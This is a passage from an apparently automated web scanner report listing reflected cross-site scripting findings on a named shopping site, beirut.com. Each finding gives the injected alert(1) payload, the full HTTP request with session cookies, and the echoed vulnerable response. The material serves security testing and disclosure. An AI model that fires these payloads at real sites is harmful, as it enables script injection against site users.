Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:23:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods7a81a'-alert(1)-'1956de7bef2/235690923/Flowers/17';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.872. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1147e<script>alert(1)</script>19941d15beb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods1147e<script>alert(1)</script>19941d15beb/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods1147e<script>alert(1)</script>19941d15beb <a href="#" id="backlink">
...[SNIP]...

4.873. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85888'-alert(1)-'9e0400966d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/23569092385888'-alert(1)-'9e0400966d6/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:30:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/23569092385888'-alert(1)-'9e0400966d6/Flowers/17';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.874. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7243f'-alert(1)-'89531dee816 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Flowers7243f'-alert(1)-'89531dee816/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:40:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Flowers7243f'-alert(1)-'89531dee816/17';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.875. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aed1'-alert(1)-'8b3b0deab09 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Flowers/171aed1'-alert(1)-'8b3b0deab09 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:43:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Flowers/171aed1'-alert(1)-'8b3b0deab09';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.876. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85667'-alert(1)-'a605d5bdfc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping85667'-alert(1)-'a605d5bdfc/Consumer-Goods/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:15:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping85667'-alert(1)-'a605d5bdfc/Consumer-Goods/235690923/Health-Products/77';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.877. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49197"><a>b145eaef40b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping49197"><a>b145eaef40b/Consumer-Goods/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:08:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping49197"><a>b145eaef40b">
...[SNIP]...

4.878. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63f65<script>alert(1)</script>40eb55dc44b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods63f65<script>alert(1)</script>40eb55dc44b/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:21:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods63f65<script>alert(1)</script>40eb55dc44b <a href="#" id="backlink">
...[SNIP]...

4.879. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d838'-alert(1)-'72d3d985711 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods6d838'-alert(1)-'72d3d985711/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:21:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods6d838'-alert(1)-'72d3d985711/235690923/Health-Products/77';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.880. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ea9'-alert(1)-'a6c4d22974 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923c8ea9'-alert(1)-'a6c4d22974/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:27:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goods/235690923c8ea9'-alert(1)-'a6c4d22974/Health-Products/77';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.881. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3dfd'-alert(1)-'90e1ff14236 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Health-Productsf3dfd'-alert(1)-'90e1ff14236/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:33:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Health-Productsf3dfd'-alert(1)-'90e1ff14236/77';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.882. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e77b'-alert(1)-'535dd4f02cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Health-Products/777e77b'-alert(1)-'535dd4f02cb HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:38:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Health-Products/777e77b'-alert(1)-'535dd4f02cb';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.883. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7add'-alert(1)-'b84110bf729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinge7add'-alert(1)-'b84110bf729/Consumer-Goods/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:22:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppinge7add'-alert(1)-'b84110bf729/Consumer-Goods/235690923/Liquor-Store/70';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.884. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d6e3"><a>13e96ed43f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping5d6e3"><a>13e96ed43f8/Consumer-Goods/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:12:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
